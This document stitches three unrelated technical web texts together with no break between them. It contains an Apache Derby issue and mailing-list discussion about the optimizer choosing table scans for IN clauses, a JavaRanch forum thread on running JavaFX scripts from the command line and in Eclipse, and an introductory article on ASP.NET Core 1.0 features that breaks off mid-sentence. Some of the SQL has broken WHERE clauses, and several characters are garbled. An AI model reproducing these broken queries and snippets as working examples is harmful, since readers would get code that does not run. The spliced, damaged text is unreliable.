DERBY-2500) has been resolved with no apparent fallout. I have also filed several Jiras for follow-up enhancements that can be done in the future, namely DERBY-2482, DERBY-2483, and DERBY-2503.
As I have not heard anything (good nor bad) from the people "watching" this issue, and since other Jiras exist for related work, I think we should be able to close this issue now.
Sunitha, if you agree can you mark this Jira as closed?
Thanks Army for all your great work on this. Closing this issue now.
I have also found this issue to be a problem and would like to know whether there are any plans to fix it?
What follows is a copy of discussion from the derby-users mailing list form 2005/11/11 "Poor query optimizer choices is making Derby unusable for large tables", it describes how the same behaviour is causing problems for a query with a GROUP BY clause:
-----------------------------------------------------------------------
Hi Kevin,
Kevin Hore wrote:
>> i) Does anyone have any plans to fix this problem?
Can you file an enhancement request for this? I think Derby could
improve it's handling of OR/IN clauses. Many databases don't optimize OR
clauses as much as possible, though some do better than others. It would
be great if Derby could internally process this as two different scans
(one for 'CONTACT' and another for 'ADD') and then combine the results.
Some databases can do this. However, the workaround suggested by Jeff L.
does this, though you have to rewrite the query.
Satheesh
>> ii) In the meantime, are there any work-arounds? I'd appreciate any{0, 3}
>> suggestions that would decrease the execution time of my second query
>> below (the one with with two search terms). Likewise, any general
>> strategies for avoiding this problem with IN clauses would be
>> appreciated.
>>
>>
>> ---
PROBLEM DESCRIPTION---
>>
>> Consider the table:
>>
>> CREATE TABLE tblSearchDictionary
>> (
>> ObjectId int NOT NULL,
>> ObjectType int NOT NULL,
>> Word VARCHAR(64) NOT NULL,
>> WordLocation int NOT NULL,
>> CONSTRAINT CONSd0e222 UNIQUE (ObjectId,ObjectType,Word,WordLocation)
>> );
>>
>> This table has an index on each of the four columns, it also has the
>> unique index across all four columns as defined above:
>>
>> CREATE INDEX tblSearchDictionaryObjectId ON tblSearchDictionary
>> (ObjectId);
>> CREATE INDEX tblSearchDictionaryObjectType ON tblSearchDictionary
>> (ObjectType);
>> CREATE INDEX tblSearchDictionaryWord ON tblSearchDictionary (Word);
>> CREATE INDEX tblSearchDictionaryWordLocation ON tblSearchDictionary
>> (WordLocation);
>>
>> The table contains about 260,000 rows.
>>
>> The following query selects all rows that match instances of string in
>> the Word column. It sums the WordLocation column having grouped by the
>> ObjectId column.
>>
>> SELECT ObjectId, SUM(WordLocation) AS Score
>> FROM tblSearchDictionary
>> WHERE> GROUP BY ObjectId;
>>
>> On my machine this will usually complete in an acceptable time of
>> around 200ms.
>>
>> Now consider the following query which adds a second search term on
>> the same column.
>>
>> SELECT ObjectId, SUM(WordLocation) AS Score
>> FROM tblSearchDictionary
>> WHERE> GROUP BY ObjectId;
>>
>> This second query usually takes around 10000ms on my machine. My
>> understanding from the Derby optimizer docs and
DERBY-47is that this
>> is because Derby is re-writing the query along the following lines,
>> and then choosing to do a table scan:
>>
>> SELECT ObjectId, SUM(WordLocation) AS Score
>> FROM tblSearchDictionary
>> WHERE
>> Word IN ('CONTACT', 'ADD')
>> AND Word >= 'ADD'
>> AND Word <= 'CONTACT'
>> GROUP BY ObjectId;
>>
>> The plan for the first query indicates that the tblSearchDictionaryWord
>> index is used to perform an index scan. However, the plan for the second
>> query indicates that the majority of the additional time is taken
>> performing a table scan over the entire table, instead of making use of
>> the indexes available. Our application uses IN quite frequently, so
>> this optimizer behaviour would seem to present a significant problem.
>>
>> --
QUERY PLAN FOR FIRST QUERY---
>>
>> Statement Name:
>> null
>> Statement Text:
>> ObjectId,
>> SUM(WordLocation) AS Score
>> FROM tblSearchDictionary
>> WHERE
>>> GROUP BY
>> ObjectId
>>
>> Parse Time: 0
>> Bind Time: 0
>> Optimize Time: 16
>> Generate Time: 0
>> Compile Time: 16
>> Execute Time: 0
>> Begin Compilation Timestamp : 2005-11-11 12:28:52.765
>> End Compilation Timestamp : 2005-11-11 12:28:52.781
>> Begin Execution Timestamp : 2005-11-11 13:08:15.406
>> End Execution Timestamp : 2005-11-11 13:08:15.406
>> Statement Execution Plan Text:
>> Project-Restrict ResultSet (5):
>> Number of opens = 1
>> Rows seen = 93
>> Rows filtered = 0
>> restriction = false
>> projection = true
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> restriction time (milliseconds) = 0
>> projection time (milliseconds) = 0
>> optimizer estimated row count: 1.00
>> optimizer estimated cost: 226.00
>>
>> Source result set:
>> Grouped Aggregate ResultSet:
>> Number of opens = 1
>> Rows input = 113
>> Has distinct aggregate = false
>> In sorted order = false
>> Sort information:
>> Number of rows input=113
>> Number of rows output=93
>> Sort type=internal
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> optimizer estimated row count: 1.00
>> optimizer estimated cost: 226.00
>>
>> Source result set:
>> Project-Restrict ResultSet (4):
>> Number of opens = 1
>> Rows seen = 113
>> Rows filtered = 0
>> restriction = false
>> projection = true
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> restriction time (milliseconds) = 0
>> projection time (milliseconds) = 0
>> optimizer estimated row count: 118.00
>> optimizer estimated cost: 226.00
>>
>> Source result set:
>> Index Row to Base Row ResultSet for TBLSEARCHDICTIONARY:
>> Number of opens = 1
>> Rows seen = 113
>> Columns accessed from heap =
>> constructor time (milliseconds) = 0{0, 2, 3}
>> open time (milliseconds) = 0
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> optimizer estimated row count: 118.00
>> optimizer estimated cost: 226.00
>>
>> Index Scan ResultSet for TBLSEARCHDICTIONARY using index
>> TBLSEARCHDICTIONARYWORD at read committed isolation level using share
>> row locking chosen by the optimizer
>> Number of opens = 1
>> Rows seen = 113
>> Rows filtered = 0
>> Fetch Size = 1
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> next time in milliseconds/row = 0
>>
>> scan information:
>> Bit set of columns fetched=All
>> Number of columns fetched=2
>> Number of deleted rows visited=0
>> Number of pages visited=4
>> Number of rows qualified=113
>> Number of rows visited=114
>> Scan type=btree
>> Tree height=3
>> start position:
>> >= on first 1 column(s).
>> Ordered null semantics on the following columns:
>> 0
>> stop position:
>> > on first 1 column(s).
>> Ordered null semantics on the following columns:
>> 0
>> qualifiers:
>> None
>> optimizer estimated row count: 118.00
>> optimizer estimated cost: 226.00
>>
>>
>> --
QUERY PLAN FOR SECOND QUERY---
>>
>> Statement Name:
>> null
>> Statement Text:
>> ObjectId,
>> SUM(WordLocation) AS Score
>> FROM tblSearchDictionary
>> WHERE
>>> GROUP BY
>> ObjectId
>>
>> Parse Time: 0
>> Bind Time: 0
>> Optimize Time: 0
>> Generate Time: 15
>> Compile Time: 15
>> Execute Time: 4250
>> Begin Compilation Timestamp : 2005-11-11 13:16:17.578
>> End Compilation Timestamp : 2005-11-11 13:16:17.593
>> Begin Execution Timestamp : 2005-11-11 13:16:17.593
>> End Execution Timestamp : 2005-11-11 13:16:27.437
>> Statement Execution Plan Text:
>> Project-Restrict ResultSet (5):
>> Number of opens = 1
>> Rows seen = 100
>> Rows filtered = 0
>> restriction = false
>> projection = true
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 4250
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> restriction time (milliseconds) = 0
>> projection time (milliseconds) = 0
>> optimizer estimated row count: 1.00
>> optimizer estimated cost: 82959.49
>>
>> Source result set:
>> Grouped Aggregate ResultSet:
>> Number of opens = 1
>> Rows input = 712
>> Has distinct aggregate = false
>> In sorted order = false
>> Sort information:
>> Number of rows input=712
>> Number of rows output=593
>> Sort type=internal
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 4250
>> next time (milliseconds) = 0
>> close time (milliseconds) = 0
>> optimizer estimated row count: 1.00
>> optimizer estimated cost: 82959.49
>>
>> Source result set:
>> Project-Restrict ResultSet (4):
>> Number of opens = 1
>> Rows seen = 712
>> Rows filtered = 0
>> restriction = false
>> projection = true
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 4219
>> close time (milliseconds) = 15
>> restriction time (milliseconds) = 0
>> projection time (milliseconds) = 0
>> optimizer estimated row count: 19200.45
>> optimizer estimated cost: 82959.49
>>
>> Source result set:
>> Project-Restrict ResultSet (3):
>> Number of opens = 1
>> Rows seen = 40806
>> Rows filtered = 40094
>> restriction = true
>> projection = false
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 4219
>> close time (milliseconds) = 15
>> restriction time (milliseconds) = 124
>> projection time (milliseconds) = 0
>> optimizer estimated row count: 19200.45
>> optimizer estimated cost: 82959.49
>>
>> Source result set:
>> Table Scan ResultSet for TBLSEARCHDICTIONARY at read
>> committed
>> isolation level using share row locking chosen by the optimizer
>> Number of opens = 1
>> Rows seen = 40806
>> Rows filtered = 0
>> Fetch Size = 1
>> constructor time (milliseconds) = 0
>> open time (milliseconds) = 0
>> next time (milliseconds) = 4001
>> close time (milliseconds) = 15
>> next time in milliseconds/row = 0
>>
>> scan information:
>> Bit set of columns fetched=
>> Number of columns fetched=3
>> Number of pages visited=2978
>> Number of rows qualified=40806
>> Number of rows visited=256001
>> Scan type=heap
>> start position:
>> null stop position:
>> null qualifiers:
>> Column[0][0] Id: 2
>> Operator: <
>> Ordered nulls: false
>> Unknown return value: true
>> Negate comparison result: true
>> Column[0][1] Id: 2
>> Operator: <=
>> Ordered nulls: false
>> Unknown return value: false
>> Negate comparison result: false
>>
>> optimizer estimated row count: 19200.45
>> optimizer estimated cost: 82959.49
>>
>> ----------
>>
>> Thanks in advance for any help!
>>
>> Kind regards,
>>
>>
>> Kevin Hore
>>
>>
>> | https://issues.apache.org/jira/browse/DERBY-47 | CC-MAIN-2015-48 | refinedweb | 18,820 | 60.14 |
The Making of the Interactive Treehouse Ad
Published by.
The Idea
- Have a "canvas" (not
<canvas>, just an area where things happen)
- Have a series of five bits of simple jQuery code
- Click a button, code runs, something happens in canvas
- You can see the code you are about to execute
- It should be visually clear the code you see is what is running and making the changes
- The whole time, the canvas area is a clickable ad for Treehouse (users aren't required to interact with the jQuery stuff, it's still just an ad)
- You can start over with the interactive steps when completed
Here's what we end up with. Demo on CodePen:
The HTML
Relevant bits commented:
<div class="ad"> <!-- Our jQuery code will run on elements in here --> <div class="canvas" id="canvas"> <a id="treehouse-ad" href="" target="_blank">Team Treehouse!</a> <img src="">
The CSS.
The JavaScript
Now we need to make this thing work. Which means...
- When button is clicked...
- Execute the code
- Increment the step
- If it's the last step, put stuff in place to start over
The Structure).
The "Steps"
We'll have five steps. As in, the different bits of jQuery that execute and do different things to our ad canvas.
- Add a "button" class to the link
- Move it up a little bit (demonstrating animation)
- Change the text of the button
- Add a new element
- Add class to the entire ad, giving it a finished feel
We'll also need to do two things with each bit of code:
- Display it
- Execute it().
The Animation
To make it visually clear what is going on when you press the "Run Code" button, I thought having the code kind of slide up and fade into the "canvas" would be a cool idea. The steps then become:
- Make a clone/duplicate code area directly on top of existing one
- Animate position upwards while fading out
- Remove clone when done
- Wait to change code text until animation has completed Guts();
The End.
That’s brilliant! I can see people copying same idea for their websites for interaction with visitors and to keep them longer on the website. And, yes I am going to try it on my site too.
Why not store the steps in the array as functions, then call
.toString()on them to extract the code?
Here’s a quick sample:
Looks like a great way of handling it to me!
Coming to think of it, there’s just one problem with this solution: you can’t minify the JS.
You’ll have to maintain the function and the display text separately.
I’ve been using that sort of structure on all my JS lately, and I find it’s so much nicer.
One thing I like to do with my code, which I picked up from others, is use a “settings” object to hold any cached items and values. So, instead of just declaring a bunch of naked variables at the top, it looks something like this:
So, as I’ve done in the
init()function, I can access any of those settings using “s.whatever”. The only flaw is that you have to define the settings at the top of each function using “this.settings”.
I don’t know if this is the best way to do this sort of thing, but I find it saves a bunch of characters, so you don’t have to do “ModuleName.variableName” every time you want a cached object.
Just be careful with that global. You want to properly declare that:
Yes, that’s right. My example was more or less theoretical. Not meant to be copy/pasted.
I usually do this something like this at the top:
And along those same lines, the other code should be “var ModuleWhatever…” because that too was global as I had written it.
Well in that case, there’s no reason for
s = this.settingsat the beginning of each function.
Once you did that in your
initfunction, it’ll be available throughout your module, since they all have access to the parent closure.
Yes, you’re right… Hmm, that actually makes it much easier. I think some of my old code has a few redundancies! :) Thanks for pointing that out.
Pretty cool… but then you have that global “s” which scares me. I think I’d prefer the repetitive
s = this.settings;in general.
@Chris I don’t think we’re talking about polluting the global namespace here. We’ll have all this in its own closure:
True.
I really love this ad. A lot of my job involves trying to make our advertisements more interesting and evaluating statistics about our advertisements. Your ad is interactive, it’s catchy, it’s very well targeted at the proper demographic… It’s pretty much perfect. Good job, as always. :)
I too have been structuring a lot of my javascript like this lately. Some things I hadn’t considered in there as well though. One thing that I have been fighting with lately is putting jquery in my functions/modules.
Obviously it could have no merit if I just know jquery will be there but I still for some reason have been fighting with relying on jQuery to be there or not.
I’d be interested to see the statistics for this ad. What percent go through all five steps and click the button, which go through all five but don’t click, do some stop at step 3, etc. Would be an interesting study since this form of advertisement is very unique.
Chris: Why do you need to declare e.preventDefault() in this block of code? Just curious… Thanks!
I probably have a href=”#” on the link so it has a proper cursor and hover state and stuff. But that href will jump to the top of the page if that line isn’t there.
That line prevents the browser from following the link in the href attribute of the a tag.
Awesome! I should have been using this for a while now ;). Thanks!
Not to be a downer on this “interactive” ad but it took me forever to even figure out what part of the ad was “Interactive” AFTER being told it was. This is due to the fact that I saw the green “treehouse” box and thought that was the ad and everything else was unrelated content. It took me a long time to read the small paragraph below the code that said it had something to do with Treehouse.
I think this is because of the dotted border around the main Treehouse ad area. It separates it, and since I’m not used to seeing interactive ads it requires a big jump for me to associate the content inside the box with the content below.
While it may be cool interaction it fails on a basic level because it takes so long to figure out that it’s somehow related to Treehouse. I’d be curious to see if the number of people interacting with the content is worth making it an interactive ad?
Thanks for the thoughts. All good stuff to consider in the future.
I feel like “Run Code” is a pretty strong verb-y button and curious folks might just click to see what it does.
It’s also kind of good that you did see the Treehouse area and just glossed over the stuff below it. It needs to be an ad first and anything else second.
Awesome as always Chris!! Thanks!
@Chris – “Run Code” can / will also scare some, already overly-cautious, users out there…. lol
@Louis – THANK YOU for bringing up the “settings” object…. I now have realized that I have some reduncancies to clean up as well…. hahaha… | https://css-tricks.com/treehouse-ad/ | CC-MAIN-2015-14 | refinedweb | 1,303 | 80.01 |
Is there a way to protect your ports via winsock?? Sort of like ZoneAlarm does - I'm fairly new to winsock so I don't know much about it.
Is there a way to protect your ports via winsock?? Sort of like ZoneAlarm does - I'm fairly new to winsock so I don't know much about it.
I think personal firewall software attatches itself to the tcp/ip stack in some way to inspect it. Similar to some virus software with real-time scanners.
Don't ask me how it's done progmatically though, because I don't have a clue.
Lookup Layered Service Providers at MSDN
HI am new to the board and winsock too
i had the same idea for a program; only problem i dont know that much about winsock so i made this last monday it listen on a port when some one connect it print the person ip;
i think i will work to make it work how i want it to plus i got a win c++ networking ebook;
and if u put it on a listening port it will not work :-()
have to include winsock stuff
#include "stdafx.h"
WSADATA WD;
struct sockaddr_in tcpaddr,enemy;
#include <stdlib.h>
int main()
{
WSAStartup(MAKEWORD(1,1),&WD);
cout<<" Pleast enter the port you want this I am sillyI am sillyI am sillyI am silly to listen on"<<endl;
int port;
cin>>port;
SOCKET G;
G=socket (AF_INET,SOCK_STREAM,IPPROTO_TCP);
tcpaddr.sin_family = AF_INET;
tcpaddr.sin_port = htons(port);
tcpaddr.sin_addr.s_addr = htonl(INADDR_ANY);
bind(G, (SOCKADDR *)&tcpaddr, sizeof(tcpaddr));
listen(G,SOMAXCONN);
while (1)
{
int A =sizeof(enemy);
accept (G,(SOCKADDR *)&enemy,&A);
cout<<"the ip"<<inet_ntoa(enemy.sin_addr)<<"the port"<<ntohs(enemy.sin_port)<<endl;
}
return 0;
}
BlackBird, I don't think that's what he's looking for.
The 'hacker' trying to connect wouldn't be able to connect anyways unless there's a trojan or something listening on that port. If there is, then your call to bind() and listen() will fail anyways, because *surprise* that port has already been taken. Then you will be utterly helpless to do anything while the hacker proceeds to destroy your computer and burn down your house, after murdering your wife and children by programmatically unplugging them from the Matrix. | http://cboard.cprogramming.com/networking-device-communication/51092-protecting-ports-via-winsock.html | CC-MAIN-2016-22 | refinedweb | 382 | 60.04 |
*
A friendly place for programming greenhorns!
Big Moose Saloon
Search
|
Java FAQ
|
Recent Topics
Register / Login
JavaRanch
»
Java Forums
»
Languages
»
Other Languages
Author
Anyone tried out JavaFX?
Frank Carver
Sheriff
Joined: Jan 07, 1999
Posts: 6920
posted
May 11, 2007 09:06:00
0
It all looks very interesting, and the demos are very impressive, but so far I have not worked out how to run my own scripts.
The tutorial provided with the code has netbeans 5.5 as a prerequisite. I can't believe that a scripting system which is advertised as being so portable
really
needs netbeans to run.
I have tried using the "bat" files in the bin directory, but they always report that they can't find my file HelloWorld.fx, even though it's right here in the current directory.
Anyone managed to run JavaFX without netbeans, yet?
Read about me at frankcarver.me
~
Raspberry Alpha Omega
~
Frank's Punchbarrel Blog
Gregg Bolinger
Ranch Hand
Joined: Jul 11, 2001
Posts: 15242
I like...
posted
May 11, 2007 10:39:00
0
I ran it with the Eclipse plugin. You have to feed the name of the script into the FXShell. So for example if you had a .fx file named HelloWorld, you might run it like the following from the command line:
java
-cp path\to\fx\jar\file net.java.javafx.FXShell HelloWorld
HTH.
GenRocket - A Test Data Generation Platform
Frank Carver
Sheriff
Joined: Jan 07, 1999
Posts: 6920
posted
May 11, 2007 13:44:00
0
Hmm. I'll try that method of invoking it. Thanks.
I tried the Eclipse plugin but it seems very "alpha". It gratuitously went and re-wrote the .classpath and .project files of all my other open java projects to refer to JavaFX. I had to manually revert changes to a dozen projects. Bleh.
Frank Carver
Sheriff
Joined: Jan 07, 1999
Posts: 6920
posted
May 11, 2007 14:01:00
0
It still doesn't work, and I can't see why.
Here's a transcript:
N:\playpen>dir/w Volume in drive N is Data Volume Serial Number is E484-4863 Directory of N:\playpen [.] [..] fx.bat HelloWorld.fx 2 File(s) 228 bytes 2 Dir(s) 240,336,633,856 bytes free N:\playpen>type fx.bat java -cp c:\java\lib\javafxrt.jar net.java.javafx.FXShell %1 N:\playpen>fx HelloWorld.fx N:\playpen>java -cp c:\java\lib\javafxrt.jar net.java.javafx.FXShell HelloWorld not found: HelloWorld.fx compile thread: Thread[AWT-EventQueue-0,6,main] compile 0.0 init: 0.032 N:\playpen>
It's clear that FXShell is running, and getting the filename parameter (it correctly adds the ".fx" to the end), but it
insists
that the file is not found.
HelloWorld.fx is copied directly from the tutorial:
import javafx.ui.*; Frame { title: "Hello World JavaFX" width: 200 height: 50 content: Label { text: "Hello World" } visible: true }
I really don't understand why the FXShell is refusing to find my script.
Frank Carver
Sheriff
Joined: Jan 07, 1999
Posts: 6920
posted
May 11, 2007 14:10:00
0
Aha! It works. I had a flashback to 10 years ago - a classpath problem
It was two problems:
1. I needed to add "." to the classpath, apparently it is attempting to load the supplied parameter as a classpath resource rather than from the filesystem or a remote URL.
2. When I finally got it to locate the source file, it also needed the other two jars in the classpath.
So, for anyone else who wants to try this, a better bat script might be:
set LIBDIR=c:\java\lib java -cp .;%LIBDIR%\javafxrt.jar;%LIBDIR%\Filters.jar;%LIBDIR%\swing-layout.jar net.java.javafx.FXShell %1
Ulf Dittmer
Marshal
Joined: Mar 22, 2005
Posts: 37517
17
posted
May 11, 2007 15:09:00
0
import javafx.ui.*; Frame { title: "Hello World JavaFX" width: 200 height: 50 content: Label { text: "Hello World" } visible: true }
So that's what it looks like - CSS meets Java? This particular code snippet looks like just another notation for a regular Frame, though ... or is there something happening implicitly that would need to be done explicitly in J2SE?
Ping & DNS, my free Android app for network diagnostics
Frank Carver
Sheriff
Joined: Jan 07, 1999
Posts: 6920
posted
May 11, 2007 16:12:00
0
The quoted example is indeed just an alternative notation.
The cleverness comes when you mix behaviour into it. Here's another example from the tutorial:
import javafx.ui.*; class HelloWorldModel { attribute saying: String; } var model = HelloWorldModel { saying: "Hello World" }; var win = Frame { title: bind "{model.saying} JavaFX" width: 200 height: 50 content: TextField { value: bind model.saying } visible: true };
This one demonstrates the use of the "bind" operation. It links (presumably using event listeners under the covers) both the frame title and the value of a text field to a value in a model object. The upshot is that when you run this (deceptively small) program, it allows you to enter a value in the text field, hit enter and it automatically updates the frame title. No other code needed.
That's beginning to get cool.
Gregg Bolinger
Ranch Hand
Joined: Jul 11, 2001
Posts: 15242
I like...
posted
May 11, 2007 17:50:00
0
The syntax is oddly similar to Groovy. Even their
String
manipulation.
Groovy:
var name = 'Gregg'
var message = "Hello ${name}"
JavaFX Script:
var name = 'Gregg'
var message = "Hello {name}"
And all the Swing stuff looks a lot like Groovy's SwingBuilder except for the binding elements. That is a nice feature of JavaFX scripting.
Juha Anon
Greenhorn
Joined: May 13, 2007
Posts: 5
posted
May 14, 2007 15:46:00
0
Instructions for the first step using the Eclipse plugin -- from novice to novice.
Do a Hello World
=============
After installing the plugin, you won't see any change at all in the Eclipse interface except when you create the first JavaFX file. Create a new Java Project, and then Hello.fx in the source directory:
new | other... | javaFX | JavaFX File.
(The source directories are managed exactly like you would do with Java sources.)
When you add your first .fx-file in your Java project, the JavaFX plugin knows it should be a JavaFX-project, and adds the .jar files which are needed. It also knows that the run-configuration should now utilize the FXShell as main class.
The contents of Hello.fx may be something like this:
import javafx.ui.*;
import
java.lang.System
;
Frame {
content: Button {
text: "Press Me"
action: operation() {
System.out.println("You pressed me");
}
}
visible: true
}
You run it by right-clicking on the project (or the file you want to run) and add a new configuration for a �JavaFX Application�. It will have net.java.javafx.FXShell for Main class. You must add the name of the Hello.fx (or just the class name, �Hello�) to tell the shell what to run. (Otherwise, it compiles and run the empty set of classes without complaining: very annoying!)
The second step: run the demo application.
==============================
To run the demo application in Eclipe, you may use �demo.DemoLauncher� for argument to the FXShell.
You must also add the �demos� directory as a source directory along with �src�. You do that under Project | Properties | Java Build Path | Source. Otherwise, I didn't have to change anyting from what I got from the Subversion trunk (or the source download).
There's some Red in the Source: ignore it!
==============================
There is one spot in the code that the plugin complains about, but it worked anyway. Someone will remove that eventually... I guess.
This is the place causing it:
incompatible types: expected net.java.javafx.type.ValueList, found javafx.ui.canvas.Group
in new Group {transform: translate(30, 30), content: new ViewOutline {selected: true, view: widget, rectHeight: h, rectWidth: w}}
Tutorial Project/javafxpadJavaFXPad.fxline 980
Juha Anon
Greenhorn
Joined: May 13, 2007
Posts: 5
posted
May 14, 2007 16:05:00
0
Eclipse is my favorite for serious work, but I would say that it's easier to start out from the demo application. There's no setup needed.
I downloaded openjfx-20070506220507.tar.gz and extracted it. Then just changed to the directory:
trunk/demos/demo
and run the command:
./demo.sh
It worked!
I haven't any classpath set. The only Java environment I have is that JAVA_HOME is set, and $JAVA_HOME/bin is in my path.
I'm running Java 1.6, but 1.5 is probably also good.
Run the tutorial, and start changing the scripts there. No need to recompile, or run! That's a small, but cute, development environment, I think.
-- Juha
Juha Anon
Greenhorn
Joined: May 13, 2007
Posts: 5
posted
May 14, 2007 16:12:00
0
I see that I was unclear. When saying: You must add the name of the Hello.fx (or just the class name, �Hello�) to tell the shell what to run.
I ment: set Hello as argument (in the Arguments tag) to the FXShell.
-- Juha
I agree. Here's the link:
subject: Anyone tried out JavaFX?
Similar Threads
JavaFX v Flex
Compatibility with Windows
JDBC and JavaFX
Insider's Guide to Mixing Swing and JavaFX
How can I include a JavaFX 2.0 application into a HTML page?
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton | http://www.coderanch.com/t/363/ol/JavaFX | CC-MAIN-2013-48 | refinedweb | 1,570 | 75.81 |
This article highlights the new features and concepts in ASP.NET Core 1.0.
The new version of ASP.NET is called ASP.NET Core (a.k.a ASP.NET 5) and it has the most significant architectural redesign of ASP.NET. This article will highlight the new features and concepts in the new ASP.NET.
ASP.NET Core 1.0 is a new open-source and cross-platform framework for building modern cloud-based web apps It has been built from the ground up to provide an optimized development framework for web apps that are either deployed to the cloud or in your local servers. Adding to that, it was redesigned to make ASP.NET leaner, modular (so you can just add features that your application requires), cross-platform (so you can easily develop and run your app on Windows, Mac or Linux that is pretty awesome) and cloud optimized (so you can deploy and debug apps over the cloud). (Read more here)
What does that mean for us that work on previous versions of ASP.NET?
If you are using the past versions of ASP.NET or if you are coming from a WebForms development background then you might find ASP.NET Core completely new. It's like the feeling of moving from classic ASP to the ASP.NET world or perhaps the feeling of my dog looking into my screen monitor while I am programming:
Here are the lists of the core significant changes in ASP.NET Core 1.0.
For the first time in the history of ASP.NET, you can run ASP.NET Core applications on OSX and Linux. Yes, ASP.NET Core apps can run on Windows, OSX and Linux. This fact opens up ASP.NET to an entirely new audience of developers and designers. ASP.NET Core comes with two flavors of runtime environments when running your app. This means that you can choose from two runtime environments to provide you greater flexibility when deploying your app as in the following.
ASP.NET Core 1.0 is a refactored version of ASP.NET and runs on top of .NET Core. It was redesigned to be modular that allows developers to plug in components that are only required for your project, most features will be available as plugins via NuGet. One of the good things about being modular is the ability to upgrade features without impacting the other features that your application uses. Adding to that, .NET Core is a cross-platform runtime that enables you to deploy apps in OSX or Linux operating systems. It also is a cloud-optimized runtime that enables you to deploy and debug apps in the cloud. The .NET Core can be bin-deployed along with your app, allowing you to run ASP.NET Core apps on the same server that targets multiple versions of the .NET Core.
You can also create an ASP.NET Core app for Windows only that runs on .NET full framework.
ASP.NET 4.6 is the latest release of .NET Full Framework which enables you to utilize all .NET components that are available and supports backward compatibility. If you plan on migrating apps to run on .NET Core then you may need to do some modifications since the .NET Core is currently limited compared to the full .NET Framework.#.
ASP.NET Core is not all about using Visual Studio. Enabling ASP.NET Core to run on Windows, OSX and Linux changes everything. For the first time, developers and designers can start building apps with ASP.NET Core using their favorite development environments such as Sublime Text and WebStorm when working with ASP.NET. That's pretty awesome!
If you create an empty ASP.NET Core project in Visual Studio 2015 then you will be surprised seeing this (unless if you have not done creating any project using a previous version of ASP.NET):
Surprised? Yes, the new project structure is totally different. The project template is completely new and now includes the following new files:
The ConfigureServices method defines the services used by your application and the Configure method is used to define what middleware makes up your request pipeline.
Yes, it's a sad fact that WebForms is not part of ASP.NET 5. You can still continue to build Web Forms apps in Visual Studio 2015 by targeting the framework .NET 4.6. However, Web Forms apps cannot take advantage of the new features of ASP.NET 5.
I've spent years building WebForms applications from small to large enterprise app. I love Web Forms, in fact I still continue supporting the community that uses WebForms at various forums such as. However, it's time to move forward, learn the new stuff and it's finally time for you to learn ASP.NET MVC. Like so many things in the past, times are changing and you either adapt or you become extinct.
Aside from WebForms, the .NET Core in general will not include Windows Forms, WCF, WPF, Silverlight and so on.
At the moment, with the current realase of ASP.NET Core 1.0 RC2, VB.NET and F# isn't supported.
The newASP.NET will see MVC, Web API and probably Web Pages combined into one framework called ASP.NET Core. Though at the current release, Web Pages and SignalR are not yet included. possibly.
In previous versions of ASP.NET MVC, the Html.Action() helper is typically used to invoke a sub-controller. ASP.NET MVC Core introduced the new View Component to replace widgets that use Html.Action().
View Components supports fully async allowing you to make view component asynchronous. Here's a sample view component that returns person profiles based on some status:
using Microsoft.AspNetCore.Mvc;
using MVC6Demo.Models;
using System.Threading.Tasks;
using System.Collections.Generic;
namespace MVC6Demo.ViewComponents
{
public class PersonListViewComponent : ViewComponent
{
public async Task
And here's the view for the View Component:
<h3>Person List</h3>
<ul>
@foreach (var p in Model) {
<li>@string.Format("{0} {1}",p.FirstName,p.LastName)</li>
}
</ul>
And here's how you call the View Components in the main view:
<div>
@await Component.InvokeAsync("PersonList", new { type = "Registered" })
</div>
ASP.NET MVC Core has few new directives that we can use in our application. Here we'll have a look at how to use @inject. The @inject directive allows you to inject some method calls from a class directly into your view. Here's a simple class that exposes some async methods:
using System.Threading.Tasks;
using System.Linq;
namespace MVC6Demo.Models
{
public class Stats
{
private PersonModel _persons = new PersonModel();
public async Task<int> GetPersonCount() {
return await Task.FromResult(_persons.GetAll.Count());
}
public async Task<int> GetRegisteredPersonCount() {
return await Task.FromResult(
_persons.GetAll.Where(o => o.Status.ToLower().Equals("registered")).Count());
}
public async Task<int> GetUnRegisteredPersonCount() {
return await Task.FromResult(
_persons.GetAll.Where(o => o.Status.ToLower().Equals("")).Count());
}
}
}
Now we can call those methods in the view using @inject like:
@inject MVC6Demo.Models.Stats Stats
@{
ViewBag.Title = "Stats";
}
<div>
<p>Registered: @await Stats.GetRegisteredPersonCount()</p>
That's pretty cool! Isn't it? :D
Check out my article about ASP.NET MVC Core for detailed example of the new features here: Getting Started with ASP.NET MVC Core
Another cool thing in ASP.NET MVC Core is the tag helpers. Tag helpers are optional replacements for the previous HTML Helpers.
So instead of doing this:
@using (Html.BeginForm("Login", "Account", FormMethod.Post,
new { @class = "form-horizontal", role = "form" }))
{
@Html.AntiForgeryToken()
<h4>Use a local account to log in.</h4>
<hr />
@Html.ValidationSummary(true, "", new { @class = "text-danger" })
<div class="form-group">
@Html.LabelFor(m => m.UserName, new { @class = "col-md-2 control-label" })
<div class="col-md-10">
@Html.TextBoxFor(m => m.UserName, new { @class = "form-control" })
@Html.ValidationMessageFor(m => m.UserName, "", new { @class = "text-danger" })
</div>
</div>
}
You can instead do this:
<form asp-
<h4>Use a local account to log in.</h4>
<hr />
<div asp-</div>
<div class="form-group">
<label asp-</label>
<div class="col-md-10">
<input asp-
<span asp-</span>
</div>
</div>
</form>
14 years ago, there was basically one web server for ASP.NET platforms and that was IIS. A few years later the Visual Studio Development Web Server (a.k.a “Cassini”) came along as a dev-only server. All of them ultimately used System.Web as the hosting layer between the application and the web server. The System.Web host is tightly coupled to IIS and is very difficult to run on another host.
